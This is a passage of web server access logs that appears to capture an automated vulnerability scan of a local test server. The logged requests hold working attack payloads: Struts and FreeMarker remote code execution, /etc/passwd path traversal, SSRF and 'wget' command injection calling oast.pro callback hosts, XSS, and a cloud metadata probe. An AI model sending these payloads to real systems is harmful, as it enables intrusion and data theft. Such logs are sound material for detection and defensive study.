+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://ca28bc0smpvbbtig07h0fi4d6ixo5m4z5.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://ca28bc0smpvbbtig07h065qrskdo33chx.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://ca28bc0smpvbbtig07h0iozchi35441t6.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.340","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://ca28bc0smpvbbtig07h078mjz65eojp4k.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbraAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 